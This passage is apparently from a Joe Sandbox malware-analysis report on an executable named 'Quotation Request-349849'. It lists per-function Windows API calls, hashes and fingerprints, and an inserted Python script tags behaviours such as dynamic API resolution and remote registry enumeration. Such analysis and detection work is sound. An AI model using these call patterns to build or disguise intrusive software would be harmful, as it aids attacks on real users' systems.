                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: 23f9ff41c2403f331ac2e9376c3e7031054a7d5608e56c77091008497b0a41dc
                                                      • Instruction ID: 541908de8fe19e5c7ca07997d09076e30a3accc75bc0cbba59a5eaffb6836be0
                                                      • Opcode Fuzzy Hash: 23f9ff41c2403f331ac2e9376c3e7031054a7d5608e56c77091008497b0a41dc
                                                      • Instruction Fuzzy Hash: 12218B71200205BBEF104FA4DC80EBB77A9FB58369F904629FE10D3191E7359C659764
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00836DBC
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836DEF
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00836E01
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00836E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 9d794cb85d7ae682d8dee3a5f2f85b984e7805dcfc809fded80ec3dc479a8aab
                                                      • Instruction ID: 6aba2d91945f68db68f1aa171c515f3bf1448717b10779ad3f424af2547268f9
                                                      • Opcode Fuzzy Hash: 9d794cb85d7ae682d8dee3a5f2f85b984e7805dcfc809fded80ec3dc479a8aab
                                                      • Instruction Fuzzy Hash: CB219574600309BBDB209F2DDC04A9977F4FF85721F208629FDA0D72D0EB7199658B90
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00836E89
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836EBB
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00836ECC
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00836F06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 2bd2789e3f2993bb72f056b3ba88bc5580563ef432e2aabbb286311bd6a24e86
                                                      • Instruction ID: ce60d5122b2c90353396838a54e1ad9c89b350c1777e8373710702118ba7ad42
                                                      • Opcode Fuzzy Hash: 2bd2789e3f2993bb72f056b3ba88bc5580563ef432e2aabbb286311bd6a24e86
                                                      • Instruction Fuzzy Hash: 0E21B275500305EBDB209FADCC04A9A77E8FF84720F308A19F9A0D72D0EB74986587A1
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083AC54
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0083ACA8
                                                      • __swprintf.LIBCMT ref: 0083ACC1
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0085F910), ref: 0083ACFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: ad3ce45f34d115f47660891a0ea7b347908658028bbfe17db1583560794c789c
                                                      • Instruction ID: b6ec93308943756e58ee3114c21899e95954a93810a5d33e2072e99cf9641d83
                                                      • Opcode Fuzzy Hash: ad3ce45f34d115f47660891a0ea7b347908658028bbfe17db1583560794c789c
                                                      • Instruction Fuzzy Hash: AB216031A00209EFCB10DF68CD45DAE7BB8FF89715B004069F909EB352DA35EA41CB61
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00831B19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: e61d8e5009581c20661225852dabf3d04c953daca8ab2d732a5db1edf8bd7452
                                                      • Instruction ID: 3275a4d05c649a1b56e91519bb7acd3c62c7c6cc1065a892db7b17d5fa6d3d5a
                                                      • Opcode Fuzzy Hash: e61d8e5009581c20661225852dabf3d04c953daca8ab2d732a5db1edf8bd7452
                                                      • Instruction Fuzzy Hash: 75113970900209CBCF00EFA4D9698BEF7B4FF66704F5084A9D914A7792EB36590ACB90
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0084EC07
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0084EC37
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0084ED6A
                                                      • CloseHandle.KERNEL32(?), ref: 0084EDEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 62d48dbcd51016e223596b0df46912e0364770d70a44e9fabb0502d08c72bca4
                                                      • Instruction ID: ec78b1384d361a10aed4f360c2d027e7da48614247402f95be55fea662e01781
                                                      • Opcode Fuzzy Hash: 62d48dbcd51016e223596b0df46912e0364770d70a44e9fabb0502d08c72bca4
                                                      • Instruction Fuzzy Hash: 99812E716047109FD760EF28C886B2AB7E5FF48720F14881EFA99DB3D2D674AC408B52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                      • Instruction ID: 341f0f7de184cab9a829c34f00882396dc76444b4d171943c14d11cb787bea47
                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                      • Instruction Fuzzy Hash: 2551B170A00B0DDBDB248FA9D88467E77A3AF40321F248729FB25973D1D7789DA18B41
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008500FD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085013C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00850183
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 008501AF
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 008501BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 9a06f02dc214223abb9fead4fefbaf10c3e3e57ae94ba6a6f10718e9b734aaab
                                                      • Instruction ID: 08d607036445dd2d962abc40a9ee665372cd1d137e5afce8fb70182f0a734078
                                                      • Opcode Fuzzy Hash: 9a06f02dc214223abb9fead4fefbaf10c3e3e57ae94ba6a6f10718e9b734aaab
                                                      • Instruction Fuzzy Hash: 5E514A71208604AFC704EF58C885E6AB7F9FF84315F44891EF995C7292EB35E908CB52
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084D927
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0084D9AA
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0084D9C6
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0084DA07
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DA21
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 36a1246832ff5f0ce1715d8f7363b415d629c1dd6fdd830fe834551ee63d17bf
                                                      • Instruction ID: 4729cdb88d857fdb3c9207c063927593a0d52fd146cfa7b9a8e118d5ab9c6fa0
                                                      • Opcode Fuzzy Hash: 36a1246832ff5f0ce1715d8f7363b415d629c1dd6fdd830fe834551ee63d17bf
                                                      • Instruction Fuzzy Hash: 23512675A00619DFCB00EFA8C4889ADBBF5FF09324B048066E959EB312D734AD45CF91
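The listings in this report are the only machine-readable record of which Win32 calls each function in the AutoIt stub makes, and several of the blocks above (GetStdHandle/CreatePipe/CreateFileW("nul"), LoadLibraryW/GetProcAddress/FreeLibrary, RegConnectRegistryW/RegOpenKeyExW/RegEnumKeyExW) are individually more telling than the API ID fingerprints. The script below is an added example, not part of the Joe Sandbox report and not code from the IDA plugin that produced it: it parses the "APIs" lines in the format printed above, groups them per function using the "Opcode ID" line that closes each block, and tags functions with behaviour labels. The line grammar is inferred from this listing, the three behaviour rules and their names are the author's own assumptions rather than Joe Sandbox signatures, and the sample text is an excerpt copied from the blocks above with the dump-source lines trimmed.

```python
"""Parse Joe Sandbox 'APIs' listings into per-function call sequences and tag behaviours.

Added example, not part of the Joe Sandbox report or of the IDA plugin that
produced it. The line format is inferred from the listing in this report; the
behaviour rules are the author's own assumptions, not Joe Sandbox signatures.
"""
import re
from collections import namedtuple
from typing import Callable, Dict, List, Optional, Tuple

Call = namedtuple("Call", "api module args ref subcall")

# One API line as the plugin prints it, e.g.
#   • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836DEF
#   • __swprintf.LIBCMT ref: 0083ACC1
#   • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The 'Opcode ID' line closes a function's metadata block and identifies it.
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]{16,})\s*$")


def parse_functions(report_text: str) -> Dict[str, List[Call]]:
    """Collect API calls from each 'APIs' header up to the next 'Opcode ID' line.

    Keys are the first 12 hex digits of the Opcode ID; values keep the calls in
    listing order, with 'Part of subcall' lines flagged as subcall=True.
    """
    functions: Dict[str, List[Call]] = {}
    pending: List[Call] = []
    for line in report_text.splitlines():
        if line.strip() == "APIs":
            pending = []
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            pending.append(Call(m.group("api"), m.group("module"), args,
                                m.group("ref"), m.group("sub") is not None))
            continue
        m = OPCODE_LINE.match(line)
        if m:
            functions[m.group("id")[:12]] = pending
            pending = []
    return functions


def _creates_nul_file(direct: List[Call]) -> bool:
    """True when CreateFileW is opened on the literal 'nul' device (stdio sink)."""
    return any(c.api == "CreateFileW" and c.args[:1] == ["nul"] for c in direct)


# (tag, APIs the function must call directly, optional extra predicate on its calls).
# Assumed labels chosen for this example; only direct calls count, because
# 'Part of subcall' lines belong to the callee, not to the function itself.
RULES: List[Tuple[str, frozenset, Optional[Callable[[List[Call]], bool]]]] = [
    ("dynamic-api-resolution", frozenset({"LoadLibraryW", "GetProcAddress"}), None),
    ("child-stdio-redirect", frozenset({"GetStdHandle", "CreatePipe", "CreateFileW"}),
     _creates_nul_file),
    ("remote-registry-enum",
     frozenset({"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumKeyExW"}), None),
]


def tag_function(calls: List[Call]) -> List[str]:
    """Return the behaviour tags whose rule is satisfied by the function's direct calls."""
    direct = [c for c in calls if not c.subcall]
    names = {c.api for c in direct}
    return [tag for tag, needed, extra in RULES
            if needed <= names and (extra is None or extra(direct))]


def tag_report(report_text: str) -> Dict[str, List[str]]:
    """Map each function's short Opcode ID to its behaviour tags."""
    return {fid: tag_function(calls) for fid, calls in parse_functions(report_text).items()}


# Excerpt copied from three blocks of this report's listing (dump-source lines trimmed).
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00836DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00836E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00836E3B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• API ID: CreateHandle$FilePipe
• Opcode ID: 9d794cb85d7ae682d8dee3a5f2f85b984e7805dcfc809fded80ec3dc479a8aab
APIs
  • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0084D9AA
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DA21
• Opcode ID: 36a1246832ff5f0ce1715d8f7363b415d629c1dd6fdd830fe834551ee63d17bf
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008500FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00850183
• RegCloseKey.ADVAPI32(00000000), ref: 008501BC
• Opcode ID: 9a06f02dc214223abb9fead4fefbaf10c3e3e57ae94ba6a6f10718e9b734aaab
"""

if __name__ == "__main__":
    for fid, tags in tag_report(SAMPLE).items():
        print(fid, tags)
```

Run it against a text export of the full report to get one line per function; functions with no tag are the normal case, since most blocks are GUI or CRT plumbing from the AutoIt runtime. Argument values such as `0000000C` and `?` are the sandbox's best-effort reconstruction and are kept as strings rather than interpreted, so rules should key on the API names and on literal strings like `nul` that the plugin resolved, not on numeric arguments.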
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0083E61F
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0083E648
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0083E687
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0083E6AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0083E6B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: 1f0d32825580b33f721d0ae98a311815f7393b12e858804dd9a76f5968153670
                                                      • Instruction ID: ca4db3df488827bb2201ff2a64ca1ce654460973f9076351f0735751d543bfde
                                                      • Opcode Fuzzy Hash: 1f0d32825580b33f721d0ae98a311815f7393b12e858804dd9a76f5968153670
                                                      • Instruction Fuzzy Hash: 39512A75A00205DFCB01EF64C9859AEBBF5FF49314F1480A9E909AB362DB35ED11DB50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d29470f3bb162fb33de4a4c8eb90f0921ad9df48036b7f9d12e8643aa21c4ef5
                                                      • Instruction ID: f498424dd7791148b4642dd711e837ade8f9385f294330700bf6a0b0914b064f
                                                      • Opcode Fuzzy Hash: d29470f3bb162fb33de4a4c8eb90f0921ad9df48036b7f9d12e8643aa21c4ef5
                                                      • Instruction Fuzzy Hash: 1741B335944A08AFD718DB28CCC8FA9BBA4FB09352F140265FD16E72E1DB309D49DA51
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 007D2357
                                                      • ScreenToClient.USER32(008957B0,?), ref: 007D2374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 007D2399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 007D23A7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 06ac84e9c00a54b7981082a3bf772ed39484e9db0bf00307f969133f9a4c3db6
                                                      • Instruction ID: b9659cd4aa2ae6962f0f001e71a735b31d7cf571d4861dfd9e5bedca03416371
                                                      • Opcode Fuzzy Hash: 06ac84e9c00a54b7981082a3bf772ed39484e9db0bf00307f969133f9a4c3db6
                                                      • Instruction Fuzzy Hash: A241AF75604209FBCF159F68CC44AE9BB74FB15320F20431AF828D32E1CB389955DB91
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008263E7
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00826433
                                                      • TranslateMessage.USER32(?), ref: 0082645C
                                                      • DispatchMessageW.USER32(?), ref: 00826466
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00826475
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: 5f4d55585feb20fca7999236dcdc3f78a4e8cbde26c21a824cb26837ad40c90b
                                                      • Instruction ID: fd5686da67ce613f3a5c1b660c20224b523f78f82c64ebb791f689f886da3cd0
                                                      • Opcode Fuzzy Hash: 5f4d55585feb20fca7999236dcdc3f78a4e8cbde26c21a824cb26837ad40c90b
                                                      • Instruction Fuzzy Hash: 9F31E531900666EFDB25EFB0EC48BB67BE8FB01304F180166E561C31A1F72594E9DBA0
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00828A30
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00828ADA
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00828AE2
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00828AF0
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00828AF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
                                                      • Instruction ID: 9ff1818779c28f7b41d0b4fcc1d181be51e639c224efb4bbb040a51db3fe6dcb
